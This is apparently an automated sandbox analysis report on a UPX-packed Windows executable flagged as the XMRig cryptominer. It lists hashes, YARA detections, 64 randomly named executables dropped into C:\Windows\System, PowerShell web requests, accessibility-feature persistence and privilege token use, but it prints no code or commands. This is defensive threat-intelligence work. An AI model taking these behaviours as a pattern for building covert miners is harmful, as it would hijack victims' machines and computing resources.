xmrig | b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41

Analysis

max time kernel
149s
max time network
146s
platform
windows7_x64
resource
win7-20240611-en
resource tags

arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
submitted
28/06/2024, 01:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
Size

1.7MB
MD5

cb4207ba094715a98495556c9525d024
SHA1

72983d9322968c3df899b3a82c6566ce7cc2df86
SHA256

b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41
SHA512

68c8975603d9e6b1ee7a909f80d706225b2436b606c6795cd68aebccbdd0a89dafddadc4eff0a6e2d12ebd1848e335e7b0e5dbe39490adef4d4fa94e6e680ce5
SSDEEP

24576:zv3/fTLF671TilQFG4P5PMkFfkeMlN675EgEPgsU5qTqOkDilK3uPpHbcMfOoQW:Lz071uv4BPMkFfdg6NsOkc2oW

Score

10^/10

xmrig execution miner persistence privilege_escalation upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects executables containing URLs to raw contents of a Github gist 13 IoCs

resource	yara_rule
behavioral1/memory/2948-13-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2948-5719-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2276-6075-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2640-6073-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2596-7519-0x000000013FA30000-0x000000013FE22000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/492-7521-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2612-7522-0x000000013F160000-0x000000013F552000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2704-7520-0x000000013FD30000-0x0000000140122000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/1912-7696-0x000000013FED0000-0x00000001402C2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2732-7697-0x000000013F950000-0x000000013FD42000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2036-7700-0x000000013F250000-0x000000013F642000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2284-7704-0x000000013F570000-0x000000013F962000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL
behavioral1/memory/2852-7706-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_RawGitHub_URL

UPX dump on OEP (original entry point) 57 IoCs

resource	yara_rule
behavioral1/memory/2360-2-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	UPX
behavioral1/files/0x000500000000b309-3.dat	UPX
behavioral1/memory/2948-13-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	UPX
behavioral1/files/0x006700000001430e-14.dat	UPX
behavioral1/files/0x000d0000000054aa-23.dat	UPX
behavioral1/files/0x0067000000014318-27.dat	UPX
behavioral1/files/0x00080000000144f6-31.dat	UPX
behavioral1/files/0x0007000000014583-34.dat	UPX
behavioral1/files/0x0007000000014651-39.dat	UPX
behavioral1/files/0x0006000000016d01-52.dat	UPX
behavioral1/files/0x0006000000016d35-78.dat	UPX
behavioral1/files/0x0006000000016d8e-94.dat	UPX
behavioral1/memory/2852-96-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	UPX
behavioral1/memory/2732-99-0x000000013F950000-0x000000013FD42000-memory.dmp	UPX
behavioral1/memory/2596-101-0x000000013FA30000-0x000000013FE22000-memory.dmp	UPX
behavioral1/memory/2612-104-0x000000013F160000-0x000000013F552000-memory.dmp	UPX
behavioral1/memory/492-106-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	UPX
behavioral1/memory/2640-111-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	UPX
behavioral1/files/0x0006000000017077-133.dat	UPX
behavioral1/files/0x000600000001753d-149.dat	UPX
behavioral1/files/0x000d00000001863a-157.dat	UPX
behavioral1/files/0x001400000001862f-153.dat	UPX
behavioral1/files/0x00060000000173be-145.dat	UPX
behavioral1/files/0x00060000000173b3-141.dat	UPX
behavioral1/files/0x00060000000171c4-137.dat	UPX
behavioral1/files/0x0006000000017038-129.dat	UPX
behavioral1/files/0x0006000000016da9-125.dat	UPX
behavioral1/files/0x0006000000016da2-121.dat	UPX
behavioral1/files/0x0006000000016d97-117.dat	UPX
behavioral1/memory/2036-112-0x000000013F250000-0x000000013F642000-memory.dmp	UPX
behavioral1/files/0x0006000000016d7f-90.dat	UPX
behavioral1/memory/1912-109-0x000000013FED0000-0x00000001402C2000-memory.dmp	UPX
behavioral1/memory/2276-107-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	UPX
behavioral1/memory/2284-102-0x000000013F570000-0x000000013F962000-memory.dmp	UPX
behavioral1/memory/2704-97-0x000000013FD30000-0x0000000140122000-memory.dmp	UPX
behavioral1/files/0x0006000000016d65-86.dat	UPX
behavioral1/files/0x0006000000016d51-82.dat	UPX
behavioral1/files/0x0006000000016d2e-74.dat	UPX
behavioral1/files/0x0006000000016d2a-70.dat	UPX
behavioral1/files/0x0006000000016d25-66.dat	UPX
behavioral1/files/0x0006000000016d11-62.dat	UPX
behavioral1/files/0x0006000000016d09-58.dat	UPX
behavioral1/files/0x0006000000016cf0-50.dat	UPX
behavioral1/files/0x0007000000015c87-46.dat	UPX
behavioral1/files/0x000d000000014f57-43.dat	UPX
behavioral1/memory/2948-5719-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	UPX
behavioral1/memory/2276-6075-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	UPX
behavioral1/memory/2640-6073-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	UPX
behavioral1/memory/2596-7519-0x000000013FA30000-0x000000013FE22000-memory.dmp	UPX
behavioral1/memory/492-7521-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	UPX
behavioral1/memory/2612-7522-0x000000013F160000-0x000000013F552000-memory.dmp	UPX
behavioral1/memory/2704-7520-0x000000013FD30000-0x0000000140122000-memory.dmp	UPX
behavioral1/memory/1912-7696-0x000000013FED0000-0x00000001402C2000-memory.dmp	UPX
behavioral1/memory/2732-7697-0x000000013F950000-0x000000013FD42000-memory.dmp	UPX
behavioral1/memory/2036-7700-0x000000013F250000-0x000000013F642000-memory.dmp	UPX
behavioral1/memory/2284-7704-0x000000013F570000-0x000000013F962000-memory.dmp	UPX
behavioral1/memory/2852-7706-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	UPX

XMRig Miner payload 13 IoCs

miner

resource	yara_rule
behavioral1/memory/2948-13-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	xmrig
behavioral1/memory/2948-5719-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	xmrig
behavioral1/memory/2276-6075-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	xmrig
behavioral1/memory/2640-6073-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	xmrig
behavioral1/memory/2596-7519-0x000000013FA30000-0x000000013FE22000-memory.dmp	xmrig
behavioral1/memory/492-7521-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	xmrig
behavioral1/memory/2612-7522-0x000000013F160000-0x000000013F552000-memory.dmp	xmrig
behavioral1/memory/2704-7520-0x000000013FD30000-0x0000000140122000-memory.dmp	xmrig
behavioral1/memory/1912-7696-0x000000013FED0000-0x00000001402C2000-memory.dmp	xmrig
behavioral1/memory/2732-7697-0x000000013F950000-0x000000013FD42000-memory.dmp	xmrig
behavioral1/memory/2036-7700-0x000000013F250000-0x000000013F642000-memory.dmp	xmrig
behavioral1/memory/2284-7704-0x000000013F570000-0x000000013F962000-memory.dmp	xmrig
behavioral1/memory/2852-7706-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1076	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
2948	hxtxzmc.exe
2852	HumSEMF.exe
2704	OQIrCmP.exe
2732	gsCfhCG.exe
2596	xniPPvw.exe
2284	iwzCkyX.exe
2612	aYAGcaG.exe
492	sTsnISy.exe
2276	rdsqhhG.exe
1912	JpThPFP.exe
2640	ggHFwGO.exe
2036	ubSwrLT.exe
2668	omkMHQY.exe
2108	kOOfVDY.exe
864	ZyfYpmV.exe
2632	mRIpWWr.exe
2148	EZXWtGH.exe
2556	FXXzEPf.exe
2752	mhRIJyB.exe
2912	BiyzdgQ.exe
2016	FhUBtcA.exe
1512	UVMweoY.exe
1584	ghFxwJi.exe
1508	bEJhFcU.exe
1664	PLAcKpc.exe
1864	YtDAtDn.exe
1948	NoyIWJq.exe
3008	cZVGRMw.exe
2404	eZQCMzD.exe
3016	qlDFaER.exe
532	fGwMwlS.exe
568	vWTFKXu.exe
1000	XcGOjKS.exe
1624	czEbwlC.exe
1728	cWSvIYw.exe
1732	DceoQqC.exe
828	wGiMiLP.exe
324	ypRLXVA.exe
2004	RUiHKqC.exe
1416	kloXcQQ.exe
684	mONydVn.exe
1180	zqHgusr.exe
1760	eRPNxMZ.exe
2032	zFrtavT.exe
2408	heJNbBZ.exe
2068	zTkEFUu.exe
1516	OLgNSNx.exe
1816	vxUxmVN.exe
1820	NlZPlYm.exe
1372	TDdOpkc.exe
2324	pmEzmEi.exe
1632	IZIgGDb.exe
1628	PMbVZpj.exe
1036	jJDpqVq.exe
540	eJKknGT.exe
576	odmoPtS.exe
2296	MnKzWAU.exe
2500	tiqJBJI.exe
760	qZOHPLX.exe
1256	vevLfrj.exe
820	DYhFCvw.exe
2292	OXjdfSN.exe
2980	PkmFmyW.exe
880	sZQNTPL.exe

Loads dropped DLL 64 IoCs

pid	Process
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2360-2-0x000000013F2B0000-0x000000013F6A2000-memory.dmp	upx
behavioral1/files/0x000500000000b309-3.dat	upx
behavioral1/memory/2948-13-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	upx
behavioral1/files/0x006700000001430e-14.dat	upx
behavioral1/files/0x000d0000000054aa-23.dat	upx
behavioral1/files/0x0067000000014318-27.dat	upx
behavioral1/files/0x00080000000144f6-31.dat	upx
behavioral1/files/0x0007000000014583-34.dat	upx
behavioral1/files/0x0007000000014651-39.dat	upx
behavioral1/files/0x0006000000016d01-52.dat	upx
behavioral1/files/0x0006000000016d35-78.dat	upx
behavioral1/files/0x0006000000016d8e-94.dat	upx
behavioral1/memory/2852-96-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	upx
behavioral1/memory/2732-99-0x000000013F950000-0x000000013FD42000-memory.dmp	upx
behavioral1/memory/2596-101-0x000000013FA30000-0x000000013FE22000-memory.dmp	upx
behavioral1/memory/2612-104-0x000000013F160000-0x000000013F552000-memory.dmp	upx
behavioral1/memory/492-106-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	upx
behavioral1/memory/2640-111-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	upx
behavioral1/files/0x0006000000017077-133.dat	upx
behavioral1/files/0x000600000001753d-149.dat	upx
behavioral1/files/0x000d00000001863a-157.dat	upx
behavioral1/files/0x001400000001862f-153.dat	upx
behavioral1/files/0x00060000000173be-145.dat	upx
behavioral1/files/0x00060000000173b3-141.dat	upx
behavioral1/files/0x00060000000171c4-137.dat	upx
behavioral1/files/0x0006000000017038-129.dat	upx
behavioral1/files/0x0006000000016da9-125.dat	upx
behavioral1/files/0x0006000000016da2-121.dat	upx
behavioral1/files/0x0006000000016d97-117.dat	upx
behavioral1/memory/2036-112-0x000000013F250000-0x000000013F642000-memory.dmp	upx
behavioral1/files/0x0006000000016d7f-90.dat	upx
behavioral1/memory/1912-109-0x000000013FED0000-0x00000001402C2000-memory.dmp	upx
behavioral1/memory/2276-107-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	upx
behavioral1/memory/2284-102-0x000000013F570000-0x000000013F962000-memory.dmp	upx
behavioral1/memory/2704-97-0x000000013FD30000-0x0000000140122000-memory.dmp	upx
behavioral1/files/0x0006000000016d65-86.dat	upx
behavioral1/files/0x0006000000016d51-82.dat	upx
behavioral1/files/0x0006000000016d2e-74.dat	upx
behavioral1/files/0x0006000000016d2a-70.dat	upx
behavioral1/files/0x0006000000016d25-66.dat	upx
behavioral1/files/0x0006000000016d11-62.dat	upx
behavioral1/files/0x0006000000016d09-58.dat	upx
behavioral1/files/0x0006000000016cf0-50.dat	upx
behavioral1/files/0x0007000000015c87-46.dat	upx
behavioral1/files/0x000d000000014f57-43.dat	upx
behavioral1/memory/2948-5719-0x000000013FAD0000-0x000000013FEC2000-memory.dmp	upx
behavioral1/memory/2276-6075-0x000000013F4B0000-0x000000013F8A2000-memory.dmp	upx
behavioral1/memory/2640-6073-0x000000013F0E0000-0x000000013F4D2000-memory.dmp	upx
behavioral1/memory/2596-7519-0x000000013FA30000-0x000000013FE22000-memory.dmp	upx
behavioral1/memory/492-7521-0x000000013F2C0000-0x000000013F6B2000-memory.dmp	upx
behavioral1/memory/2612-7522-0x000000013F160000-0x000000013F552000-memory.dmp	upx
behavioral1/memory/2704-7520-0x000000013FD30000-0x0000000140122000-memory.dmp	upx
behavioral1/memory/1912-7696-0x000000013FED0000-0x00000001402C2000-memory.dmp	upx
behavioral1/memory/2732-7697-0x000000013F950000-0x000000013FD42000-memory.dmp	upx
behavioral1/memory/2036-7700-0x000000013F250000-0x000000013F642000-memory.dmp	upx
behavioral1/memory/2284-7704-0x000000013F570000-0x000000013F962000-memory.dmp	upx
behavioral1/memory/2852-7706-0x000000013F6C0000-0x000000013FAB2000-memory.dmp	upx

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\ACDLwOF.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\VqQYhQh.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\bQKCoCn.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\GpmVkrr.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\QfNCDrk.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\LCaEPQS.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\XTHzMij.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\tdHqJYB.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\aqkgJEj.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\TUosdxy.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\DssCjdq.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\jBvoQKK.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\tSrdAde.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\wFnWZAV.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\HqZsaFJ.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\FWvSTdH.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\OFBbSlC.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\ExNrDfq.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\GTurjhw.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\CetFtKc.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\guZHGAD.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\YhfoLFe.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\igXUjKM.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\nUjdDMI.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\wSXFhQT.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\YlJiZpW.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\MovIQvV.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\OgUYzTS.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\slRYTlH.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\PtnEpkr.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\NjFNjxQ.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\CzRDPrT.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\etNqZKf.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\STVhTVn.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\DqsKATV.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\hWyYaSC.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\XTdHzpj.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\yIBhwky.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\hEsPghj.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\YPwAaRr.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\nzyAqFL.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\nLOLYVh.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\CIwUdkE.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\KUCdzfa.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\LJeAkKc.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\ojUuuFm.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\aVYnizn.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\hiIITkU.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\SnCgWYi.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\kUezekH.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\UzDCFRA.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\UBVqrNy.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\lpPHBkS.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\IDSWiSX.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\MlsQUKu.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\KOfAetw.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\AmuhJGg.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\RtgflqW.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\kDfistr.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\zOpQmjg.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\UHsKVtu.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\XcipEoM.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\FZOhCfJ.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
File created	C:\Windows\System\PewwiMU.exe	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe

Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1076	powershell.exe
1076	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
Token: SeLockMemoryPrivilege	2360	b42f1c8e33f8bda3b3c072cdded956caa8f4053748f2111874f39957b5a98b41.exe
